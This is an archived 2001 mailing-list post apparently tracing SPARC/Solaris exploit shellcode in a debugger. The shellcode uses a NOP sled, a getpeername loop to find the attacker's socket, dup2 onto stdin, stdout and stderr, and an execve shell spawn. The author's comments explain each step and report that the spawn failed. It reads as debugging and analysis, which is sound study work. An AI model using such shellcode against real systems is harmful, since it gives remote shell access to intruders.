0x6dd9c mov 0x3, %l3 add %l0, 0x2, %o0 mov 0x9, %o1 add %l3, -0x1, %o2 mov 0x3e, %g1 addcc %l3, -0x1, %l3 bne 0x6ddd0 ta 0x8 bn,a 0x6dde8 bn,a 0x6ddec call 0x6ddf0 add %o7, 0x20, %o0 add %o0, 0x10, %o1 st %g0, [%o0 + 0x8] st %o0, [%o0 + 0x10] 6dc8c+20:b :c breakpoint at: 6dcac: xor %l1, %l1, %g0 .,10/i 6dcac: xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 6dcec: xor %l1, %l1, %g0 6dcac+10:b :c breakpoint at: 6dcbc: xor %l1, %l1, %g0 .,10/i 6dcbc: xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 6dcbc+40:b :c breakpoint at: 6dcfc: xor %l1, %l1, %g0 .,10/i 6dcfc: xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 6dd3c: xor %l1, %l1, %g0 6dd3c:b :c breakpoint at: 6dd3c: xor %l1, %l1, %g0 .20/i bad command .,20/i 6dd3c: xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 xor %l1, %l1, %g0 bn,a 0x6dd5c bn,a 0x6dd60 call 0x6dd64 sethi %hi(0xba94400), %i1 mov 0xff, %l0 mov 0x54, %l1 add %o7, -0x30, %l2 add %o7, 0x28, %l5 jmp %l5 + 0x8 stb %g0, [%o7 + 0x4] ld [%o7 - 0x30], %l3 ld [%o7 + 0x4], %l4 subcc %l3, %l4, %l4 be 0x6dd80 add %o7, 0x5c, %l5 st %l1, [%o7 - 0x3c] st %l1, [%o7 - 0x38] st %l2, [%o7 - 0x34] add %l0, 0x1, %o0 sll %l1, 0x8, %l3 or %l3, 0x91, %o1 add %o7, -0x3c, %o2 mov 0x36, %g1 $r g0 0 l0 801c4011 g1 67568 l1 801c4011 g2 0 l2 801c4011 g3 0 l3 801c4011 g4 0 l4 801c4011 g5 0 l5 801c4011 g6 0 l6 801c4011 g7 0 l7 801c4011 o0 6dc80 i0 801c4011 o1 6dc80 i1 801c4011 o2 6dc80 i2 801c4011 o3 6dc80 i3 91d02001 o4 6dc80 i4 801c4011 o5 6dc80 i5 801c4011 sp 6dc80 fp 801c4011 o7 6dc80 i7 91d02001 y 0 tstate: 4482001a04 (ccr=0x44, asi=0x82, pstate=0x1a, cwp=0x4) pstate: ag:0 ie:1 priv:0 am:1 pef:1 mm:0 tle:0 cle:0 mg:0 ig:0 pc 6dd3c 6dd3c: xor %l1, %l1, %g0 npc 6dd40 6dd40: xor %l1, %l1, %g0 :s stopped at: 6dd40: xor %l1, %l1, %g0 :s stopped at: 6dd44: xor %l1, %l1, %g0 :s stopped at: 6dd48: xor %l1, %l1, %g0 :s stopped at: 6dd4c: xor %l1, %l1, %g0 :s stopped at: 6dd50: xor %l1, %l1, %g0 :s stopped at: 6dd54: xor %l1, %l1, %g0 :s stopped at: 6dd58: xor %l1, %l1, %g0 :s stopped at: 6dd5c: xor %l1, %l1, %g0 :s stopped at: 6dd60: bn,a 0x6dd5c :s stopped at: 6dd68: call 0x6dd64 :s stopped at: 6dd6c: sethi %hi(0xba94400), %i1 :S stopped at: 6dd64: bn,a 0x6dd60 :s stopped at: 6dd6c: sethi %hi(0xba94400), %i1 :s stopped at: 6dd70: mov 0xff, %l0 :s stopped at: 6dd74: mov 0x54, %l1 :s stopped at: 6dd78: add %o7, -0x30, %l2 :s stopped at: 6dd7c: add %o7, 0x28, %l5 :S stopped at: 6dd80: jmp %l5 + 0x8 :s stopped at: 6dd84: stb %g0, [%o7 + 0x4] :s stopped at: 6dd98: add %o7, 0x5c, %l5 :s stopped at: 6dd9c: st %l1, [%o7 - 0x3c] :s stopped at: 6dda0: st %l1, [%o7 - 0x38] :s stopped at: 6dda4: st %l2, [%o7 - 0x34] :s stopped at: 6dda8: add %l0, 0x1, %o0 :s stopped at: 6ddac: sll %l1, 0x8, %l3 :s stopped at: 6ddb0: or %l3, 0x91, %o1 :s stopped at: 6ddb4: add %o7, -0x3c, %o2 :s stopped at: 6ddb8: mov 0x36, %g1 :s stopped at: 6ddbc: ta 0x8 /* For getPeername system call, refer to LSD-PL doc for correct register value. In particular: g1=36, o0=sfd(socket file decriptor), o1=request ID, o2 is pointer to structure {54 54 pointerInternetAdd} for our case is 6dd2c. returnAdd point to the memory next to it , which is 6dd38 */ $r g0 0 l0 ff g1 36 l1 54 g2 0 l2 6dd38 g3 0 l3 5400 g4 0 l4 801c4011 g5 0 l5 6ddc4 g6 0 l6 801c4011 g7 0 l7 801c4011 o0 100 i0 801c4011 o1 5491 i1 ba94400 o2 6dd2c i2 801c4011 o3 6dc80 i3 801c4011 o4 6dc80 i4 801c4011 o5 6dc80 i5 801c4011 sp 6dc80 fp 801c4011 o7 6dd68 i7 801c4011 y 0 tstate: 4482001a00 (ccr=0x44, asi=0x82, pstate=0x1a, cwp=0x0) pstate: ag:0 ie:1 priv:0 am:1 pef:1 mm:0 tle:0 cle:0 mg:0 ig:0 pc 6ddbc 6ddbc: ta 0x8 npc 6ddc0 6ddc0: bgeu 0x6dd84 6dd2c/4X 6dd2c: 54 54 6dd38 801c4011 6dd3c: 801c4011 801c4011 801c4011 801c4011 6ddbc/i 6ddbc: ta 0x8 .,10/i 6ddbc: ta 0x8 bgeu 0x6dd84 subcc %l0, 0x1, %l0 bne 0x6dd9c mov 0x3, %l3 add %l0, 0x2, %o0 mov 0x9, %o1 add %l3, -0x1, %o2 mov 0x3e, %g1 addcc %l3, -0x1, %l3 bne 0x6ddd0 ta 0x8 bn,a 0x6dde8 bn,a 0x6ddec call 0x6ddf0 add %o7, 0x20, %o0 stopped at: 6ddd4: mov 0x9, %o1 :s stopped at: 6ddd8: add %l3, -0x1, %o2 :s stopped at: 6dddc: mov 0x3e, %g1 :s stopped at: 6dde0: addcc %l3, -0x1, %l3 :s stopped at: 6dde4: bne 0x6ddd0 :s stopped at: 6dde8: ta 0x8 /* After the above getPeername function iterate from 100 to 0, it successfully locate the socket fd --8, to current client , Now it duplicate the fd to fd 0/1/2 and try to spawn a shell */ $r g0 0 l0 6 g1 3e l1 54 g2 0 l2 6dd38 g3 0 l3 2 g4 0 l4 0 g5 0 l5 6ddc4 g6 0 l6 801c4011 g7 0 l7 801c4011 o0 8 i0 801c4011 o1 9 i1 ba94400 o2 2 i2 801c4011 o3 6dc80 i3 801c4011 o4 6dc80 i4 801c4011 o5 6dc80 i5 801c4011 sp 6dc80 fp 801c4011 o7 6dd68 i7 801c4011 y 0 tstate: 1182001a02 (ccr=0x11, asi=0x82, pstate=0x1a, cwp=0x2) pstate: ag:0 ie:1 priv:0 am:1 pef:1 mm:0 tle:0 cle:0 mg:0 ig:0 pc 6dde8 6dde8: ta 0x8 npc 6ddd0 6ddd0: add %l0, 0x2, %o0 .,10/i 6ddd0: add %l0, 0x2, %o0 mov 0x9, %o1 add %l3, -0x1, %o2 mov 0x3e, %g1 addcc %l3, -0x1, %l3 bne 0x6ddd0 ta 0x8 bn,a 0x6dde8 bn,a 0x6ddec call 0x6ddf0 add %o7, 0x20, %o0 add %o0, 0x10, %o1 st %g0, [%o0 + 0x8] st %o0, [%o0 + 0x10] st %g0, [%o0 + 0x14] mov 0xb, %g1 6de10: ta 0x8 6ddd0/i 6ddd0: add %l0, 0x2, %o0 :c breakpoint at: 6ddd0: add %l0, 0x2, %o0 6ddd0:d :c /*The shell spawn seem fail for some reason and we didn't receive a interactive channel from client side*/ stopped at: _rt_boot: ba,a _elf_start :c SIGSEGV: Segmentation Fault (address not mapped to object) stopped at: elf_find_sym+0xa4: ld [%o0 + %i2], %o1
This archive was generated by hypermail 2b30 : Wed Oct 31 2001 - 13:40:57 PST